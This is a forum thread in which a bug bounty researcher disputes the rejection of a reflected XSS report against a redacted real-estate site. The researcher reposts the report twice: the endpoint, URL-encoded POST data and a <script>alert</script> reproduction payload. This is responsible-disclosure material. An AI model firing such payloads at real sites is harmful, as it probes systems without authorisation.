Can't reproduce vulnerability

[willc]

632611

I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.

[x1admin]

632611

I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.

You forgot to provide PoC

[AnotherWayIn]

I have the same. It would be helpful if we could be given a short reason why it was rejected.

[willc]

You forgot to provide PoC

Where is a PoC supposed to be provided? There is no PoC field in the submission form. And in what format? A screenshot?

There is so much about this process that seems unclear.

[x1admin]

Our report form have hints and examples, please read

[willc]

Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.

Other submissions have been approved, and they were submitted the same way.

Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:

-----------------------
Vulnerability Type: XSS

XSS URL: http://www.[REDACTED].com/idx/search-form/

POST Data: (x-www-form-urlencoded )

POST /property-search/sist_ajax/get_locations.asp

searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D

Cookies: N/A

Application: Custom Code

Comment:

STEPS TO REPRODUCE:
In Chrome or Firefox:

1. Go to http://www.[REDACTED].com/idx/search-form/

2. Enter this into the "Quick Search by Address or MLS Number"search field:

<script>alert("OPENBUGBOUNTY")</script>

Press Enter/Return.

I look forward to your response. Thanks.

[x1admin]

Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.

Other submissions have been approved, and they were submitted the same way.

Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:

-----------------------
Vulnerability Type: XSS

XSS URL: http://www.[REDACTED].com/idx/search-form/

POST Data: (x-www-form-urlencoded )

POST /property-search/sist_ajax/get_locations.asp

searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D

Cookies: N/A

Application: Custom Code

Comment:

STEPS TO REPRODUCE:
In Chrome or Firefox:

1. Go to http://www.[REDACTED].com/idx/search-form/

2. Enter this into the "Quick Search by Address or MLS Number"search field:

<script>alert("OPENBUGBOUNTY")</script>

Press Enter/Return.

I look forward to your response. Thanks.

In report 632611 you forgot to provide POST data